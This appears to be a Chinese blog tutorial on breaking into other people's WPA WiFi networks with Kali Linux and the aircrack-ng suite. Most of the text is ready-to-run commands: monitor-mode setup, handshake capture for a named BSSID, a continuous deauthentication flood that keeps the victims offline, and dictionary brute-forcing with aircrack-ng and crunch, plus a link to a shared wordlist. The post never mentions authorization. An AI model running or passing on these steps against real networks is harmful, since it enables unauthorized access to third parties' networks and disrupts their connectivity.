******* 准备:
1、VMware 15.5Pro、kali系统
2、外接无线网卡(某宝、便宜、免安装)
1、连接网卡
记得开启VMUSBArbService服务:
2、iwconfig查看无线网络设备信息
3、airmon-ng check kill 找出需要杀死的影响网卡的进程
kill 860 杀死影响网卡的进程
4、airmon-ng start wlan0 开启网卡,将网卡设置为监听模式
iwconfig 查看一下发现Mode已设置为Monitor模式,wlan0更名为wlan0mon(不一定会改名):
5、airodump-ng wlan0mon 扫描周围的wifi
参数详解:
BSSID:MAC地址
PWR:信号强度,越小信号越强
#Data:传输的数据, 数据越大对我们越有利, 说明正在使用
CH:信道
ESSID:wifi名称
6、airodump-ng -c [信道] --bssid [MAC地址] -w [获取到的文件的保存路径] wlan0mon 进行抓包
选择wifi,找对应的MAC地址、信道
开始抓包
airodump-ng -c 11 --bssid D0:76:E7:41:A9:D1 -w abc/handshake wlan0mon
显示有三个正在使用wifi的
7、aireplay-ng -0 0 -a [MAC地址] wlan0mon 进行攻击
注意:需要重开一个终端窗口
aireplay-ng -0 0 -a D0:76:E7:41:A9:D1 wlan0mon 进行洪水攻击,0代表不断地攻击
直到获取到WPA handshake包
ctrl+C 停止掉两个窗口的进程,否则对方会一直处于断网状态。
8、aircrack-ng -w [字典文件路径及名] [获取到的以.cap结尾的文件] 进行字典爆破
aircrack-ng -w wpa专用.txt handshake-01.cap开始爆破
爆破成功,找到密码(这需要好的运气和强大的字典的支持)
可以用kali的crunch自动生成字典
crunch [最小长度] [最大长度] [所使用的字符] >> [文件名]
例如:crunch 3 5 123 >>/root/Desktop/pass.txt ---- 将字符最小长度是3,最大长度是5,由123组成的字典保存在Desktop上的pass.txt文件中
分享一下我的小字典,仅供娱乐:
链接:https://pan.baidu.com/s/1KjFSunHPMZhD_i9b1XlxLQ
提取码:synb
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
